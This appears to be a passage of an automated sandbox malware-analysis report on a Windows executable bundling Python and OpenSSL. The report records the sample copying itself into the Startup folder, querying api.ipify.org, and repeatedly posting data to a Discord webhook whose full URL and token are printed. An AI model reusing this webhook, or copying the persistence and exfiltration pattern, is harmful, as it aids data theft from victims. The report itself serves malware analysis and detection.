            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,10_2_00007FFBBB821B31
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB87F8F0 CRYPTO_free,CRYPTO_strndup,10_2_00007FFBBB87F8F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB86E040 CRYPTO_free,10_2_00007FFBBB86E040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,10_2_00007FFBBB821AB4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82DFB2 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,10_2_00007FFBBB82DFB2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82103C CRYPTO_malloc,COMP_expand_block,10_2_00007FFBBB82103C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB854000 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,10_2_00007FFBBB854000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82236F CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,10_2_00007FFBBB82236F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB822027 CRYPTO_free,10_2_00007FFBBB822027
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,10_2_00007FFBBB821AC3
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB891F70 CRYPTO_memcmp,10_2_00007FFBBB891F70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821EDD CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,10_2_00007FFBBB821EDD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821D8E EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,10_2_00007FFBBB821D8E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB823EB0 CRYPTO_free,10_2_00007FFBBB823EB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB83BEC0 CRYPTO_free,CRYPTO_memdup,10_2_00007FFBBB83BEC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82DEC0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,10_2_00007FFBBB82DEC0
            Source: HyZh4pn0RF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAA99000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842850909.00007FFBBC153000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1843366024.00007FFBBC261000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1839349243.00007FFBB4C47000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841121010.00007FFBBAE72000.00000002.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1840833630.00007FFBB7FB8000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838082520.00007FFBAB6F2000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842565303.00007FFBBBE93000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841637269.00007FFBBAF59000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838782626.00007FFBAB7ED000.00000002.00000001.01000000.0000000F.sdmp
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4888D0 FindFirstFileExW,FindClose,0_2_00007FF78F4888D0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF78F497E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF78F497E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78F4A1EE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,9_2_00007FF769337E4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF7693288D0 FindFirstFileExW,FindClose,9_2_00007FF7693288D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769341EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00007FF769341EE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,9_2_00007FF769337E4C
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
            Source: Joe Sandbox ViewIP Address: 45.112.123.126 45.112.123.126
            Source: Joe Sandbox ViewIP Address: 159.89.102.253 159.89.102.253
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
